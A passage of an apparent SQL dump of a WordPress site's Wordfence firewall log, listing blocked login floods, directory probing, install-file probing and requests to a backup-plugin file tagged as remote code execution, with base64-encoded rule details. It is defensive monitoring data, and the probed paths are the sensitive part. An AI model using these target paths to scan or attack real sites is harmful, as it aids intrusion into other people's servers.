User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(15254,1704880026.053788,1704880025.962600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/images/slider/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(15186,1704857734.805477,1704857734.735700,'&\0\0}\0Un{Lˬ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15231,0.000000,1704871727.834423,'\0\0\0\0\0\0\0\0\0\0 ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15229,0.000000,1704870441.172950,' A\0:e\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15230,0.000000,1704870836.830482,'\0\0\0\0\0\0\0\0\0\0#\'',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15238,0.000000,1704878283.469530,'\0\0\0\0\0\0\0\0\0\0n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15239,0.000000,1704879310.651024,'\0\0\0\0\0\0\0\0\0\0#Ǽ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15240,0.000000,1704879588.780765,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15241,1704880060.059344,1704880059.952000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15242,1704880057.946530,1704880057.856200,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15243,1704880056.501425,1704880056.405300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15244,1704880055.284325,1704880055.191600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(15245,1704880053.375403,1704880053.299700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(15246,1704880050.743239,1704880050.663100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(15247,1704880049.568654,1704880049.468300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(15187,1704857656.004215,1704857655.942600,'&\0\0}\0Un{Lˬ',0,403,0,0,0,'https://tummyrevolution.com//wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"category\":\"rce\",\"ssl\":1}'),(15191,0.000000,1704858468.881136,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15192,0.000000,1704858468.836167,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15193,1704858985.068711,1704858984.981300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15194,1704858985.065207,1704858984.982000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15195,0.000000,1704859062.230996,'\0\0\0\0\0\0\0\0\0\0 m',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15196,0.000000,1704859502.677740,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15197,0.000000,1704859502.782153,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15198,1704860013.478331,1704860013.390000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15199,1704860013.469593,1704860013.392200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15200,0.000000,1704860355.294919,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15201,0.000000,1704860528.411942,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15202,0.000000,1704860528.269904,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15203,1704861038.040285,1704861037.969800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15204,1704861038.006077,1704861037.952500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15205,0.000000,1704861551.536695,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15206,0.000000,1704861551.530708,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15207,0.000000,1704861563.061707,'\0\0\0\0\0\0\0\0\0\0#8',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15208,1704861581.272933,1704861581.232800,'\0\0\0\0\0\0\0\0\0\0.w',0,403,0,0,0,'https://www.tummyrevolution.com//wp-admin/install.php','http://www.tummyrevolution.com//wp-admin/install.php','Go-http-client/2.0','blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"Ly93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(15210,1704861916.062786,1704861915.999200,'\0\0\0\0\0\0\0\0\0\0.w',0,403,0,0,0,'https://tummyrevolution.com//wp-admin/install.php','http://tummyrevolution.com//wp-admin/install.php','Go-http-client/2.0','blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"Ly93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(15209,0.000000,1704861613.676828,'\0\0\0\0\0\0\0\0\0\0S#@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15213,0.000000,1704862567.936286,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15214,0.000000,1704862567.953030,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15215,0.000000,1704862869.614609,'*\0i\ZP\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15211,1704862055.944026,1704862055.870300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15212,1704862055.923565,1704862055.851800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15216,1704863125.622355,1704863125.512900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15217,1704863125.615162,1704863125.513300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15218,0.000000,1704863408.421516,'\0\0\0\0\0\0\0\0\0\0:N',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15219,0.000000,1704864134.924580,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15220,0.000000,1704864817.579643,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15221,0.000000,1704865395.247901,'\0\0\0\0\0\0\0\0\0\0^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15222,0.000000,1704866172.810714,'*\0:@A\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15223,0.000000,1704866646.231556,'\0\0\0\0\0\0\0\0\0\0U[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15224,0.000000,1704867892.221383,'*\0\Z(]\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15225,0.000000,1704868888.226641,'\0\0\0\0\0\0\0\0\0\0э9W',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15226,0.000000,1704869151.391091,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15227,1704869616.666748,1704869616.587200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15235,0.000000,1704875615.458650,'\0\0\0\0\0\0\0\0\0\0} ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15236,0.000000,1704876527.176740,'\0\0\0\0\0\0\0\0\0\0K',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15237,0.000000,1704876948.163916,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15228,1704869586.027865,1704869585.950600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15232,0.000000,1704871943.151835,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15233,0.000000,1704874302.714662,'$\0a\0\0\0\0\0\0\0m',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15234,0.000000,1704875125.190050,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:41.0) Gecko/20100101 Firefox/41.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15188,0.000000,1704857774.135418,'\0\0\0\0\0\0\0\0\0\0\\?Α',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15189,1704857947.186601,1704857947.105500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security 